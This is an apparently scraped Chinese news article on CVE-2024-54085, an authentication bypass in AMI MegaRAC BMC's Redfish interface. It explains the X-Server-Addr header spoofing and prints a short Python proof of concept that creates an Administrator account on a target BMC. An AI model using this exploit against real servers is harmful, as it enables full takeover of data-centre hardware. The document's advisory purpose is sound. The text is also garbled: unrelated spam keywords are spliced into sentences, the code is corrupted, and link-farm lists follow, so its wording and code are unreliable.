您现在的位置是:测试开发营 > 物联网
重大漏洞警示:AMI BMC 漏洞可能导致远程认证绕过
测试开发营2025-11-26 22:54:06【物联网】3人已围观
简介安全研究人员近期发现,AMI的MegaRAC软件中存在一个严重的漏洞,该漏洞可能被攻击者利用以远程绕过认证。这一漏洞编号为CVE-2024-54085,已影响众多数据中心设备和服务器型号,可能危及全球
安全研究人员近期发现,漏洞漏洞AMI的警示MegaRAC软件中存在一个严重的漏洞,该漏洞可能被攻击者利用以远程绕过认证 。远程这一漏洞编号为CVE-2024-54085,认证绕过已影响众多数据中心设备和服务器型号,漏洞漏洞可能危及全球多家组织的警示云基础设施安全 。
该漏洞存在于AMI的远程基板管理控制器(BMC)软件的Redfish接口中 ,源码库波及的认证绕过设备包括HPE Cray XD670和Asus RS720A-E11-RS24U服务器等。根据安全分析 ,漏洞漏洞通过Shodan搜索 ,警示研究人员已在公共互联网上发现了大约1000个暴露在外的远程实例 。

Shodan上暴露的认证绕过实例(来源:Eclypsium)
漏洞影响范围Eclypsium的研究人员指出 ,截至2024年8月的漏洞漏洞MegaRAC版本均受到该认证绕过漏洞的云计算影响。调查显示,警示漏洞存在于固件文件系统中的远程host-interface-support-module.lua文件中 ,攻击者可通过操纵HTTP标头值来绕过安全控制。
该漏洞的严重性不容小觑,当Redfish接口直接暴露在互联网上时,其CVSS评分高达10.0(CVSSv3)和10.0(CVSSv4)。即使在Redfish访问仅限于相邻网络的环境中,服务器租用CVSS评分仍高达9.6(CVSSv3)和9.4(CVSSv4)。
成功利用该漏洞的攻击者可以完全远程控制受影响的服务器,部署恶意软件或勒索软件 ,篡改固件 ,甚至通过过压条件物理损坏硬件,或制造无限重启循环,导致受害者无法恢复 ,除非重新配置设备。
漏洞利用细节这一漏洞的亿华云根源在于Redfish接口中的输入验证不充分 。漏洞代码虽然检查了HTTP标头值,但可以被精心设计的请求欺骗。当用户添加X-Server-Addr标头时,lighttpd Web服务器会将其结构化为用户输入,后跟服务器的实际地址,例如 :
复制`X-Server-Addr: , ::ffff:1.2.3.4`1.漏洞代码使用正则表达式提取第一个冒号之前的所有内容 ,高防服务器这意味着如果攻击者发送“169.254.0.17:”作为输入,系统将提取“169.254.0.17” ,从而匹配数据库值并绕过认证 。
以下是一个简单的漏洞利用示例:
复制`import requests print( json.dumps(requests.post( https://:8443/redfish/v1/AccountService/Accounts, jsnotallow={ Name: Hax0r, Password: password, UserName: demo712, RoleId: Administrator, }, verify=False, headers={ X-Server-Addr: 169.254.0.17: } ).json(), indent=2) )`1. 修复建议AMI已向OEM制造商发布了补丁,制造商需将这些修复措施整合到客户更新中 。建议各组织机构确保远程管理接口不对外暴露,并定期对所有服务器进行固件更新 。
很赞哦!(4543)
热门文章
站长推荐
友情链接
- 小米Note2(小米Note2在市场上受到广泛关注,销量持续飙升)
- BugooG1(探索BugooG1的卓越性能和创新设计)
- vivo y29定时开关机设置方法
- 使用戴尔笔记本微PE装Win10的详细教程(快速方便地安装Windows10操作系统的方法)
- LGG5屏幕素质解析(一起来探索LGG5屏幕的精彩之处)
- EA888发动机(卓越性能、可靠稳定、绿色环保的EA888发动机)
- 安卓手机怎么空手接电话
- 联想B41-80优盘安装系统教程(快速、简单地为联想B41-80电脑安装操作系统)
- 雨林木风系统盘教程(轻松操作,让电脑重获新生)
- 使用最新版U盘装Win7系统教程(轻松安装最新版Win7系统的详细步骤) b2b信息平台源码库香港物理机云服务器企业服务器网站建设亿华云







